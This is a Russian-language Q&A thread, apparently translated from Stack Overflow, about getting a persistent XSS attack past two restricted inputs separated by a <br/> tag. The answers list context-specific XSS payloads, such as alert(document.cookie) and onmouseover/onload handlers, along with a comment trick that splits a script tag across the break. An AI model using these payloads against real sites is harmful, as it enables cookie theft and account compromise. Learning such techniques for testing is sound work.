XSS с <script> и <br/>

Question

XSS с <script> и <br/>

Как вы выполняете XSS-атаку с этими ограничениями:

[input 1] <br/> [input 2]

Вход 1 имеет следующие ограничения: - Только 10 символов - Необработанные

Вход 2 имеет следующие ограничения: - "<", ">", "&" очищены - других ограничений нет

Кроме того, веб-страница допускает постоянный ввод, но как только я открываю тег, я не могу выполнить дополнительные вводы.

Я пытался сделать:

<script> <br/> alert(document.cookie)

Но, похоже, это не работает, возможно, из-за тега br. Есть мысли о том, как мне поступить?

-2

javascript html xss persistent

Источник

user5436042 20 сен '16 в 07:20

2 ответа

Другие вопросы по тегам javascript html xss persistent

user4726857 21 сен '16 в 16:11 2016-09-21 16:11 · Answer 1 · 2016-09-21 16:11

Вы сказали:

Вход 1 имеет следующие ограничения: - Только 10 символов - Необработанные

Если значение этого ввода только отражено на странице (без контроля максимальной длины на стороне сервера), вы можете просто использовать Инструменты разработчика вашего браузера, чтобы увеличить значение ввода максимальной длины, а затем ввести нужные полезные данные.

И тогда вы сказали:

Вход 2 имеет следующие ограничения: - "<", ">", "&" очищены - других ограничений нет

Теперь это зависит от того, где отражается значение этого ввода:

Если значение параметра Input отражено в Javascript, вы можете попробовать:

";alert('XSS');//
");alert(document.cookie);
; window.open(www.google.com);
';alert(String.fromCharCode(88,83,83))//

Если значение параметра Input отражено в теге ввода HTML или в другом коде HTML, вы можете попробовать:

1? onmouseover=alert("xss"); "
"onload='confirm("test XSS")’
" onload=window.open(www.google.com)
" onload='javascript:alert(1)’

XSS зависит от того, где это отражается!!! Вы должны использовать свой мозг тоже.

user6570042 20 сен '16 в 08:14 2016-09-20 08:14 · Answer 2 · 2016-09-20 08:14

Например: <script>/* <br/> */ alert(1); /*

0

Источник

user6570042 20 сен '16 в 08:14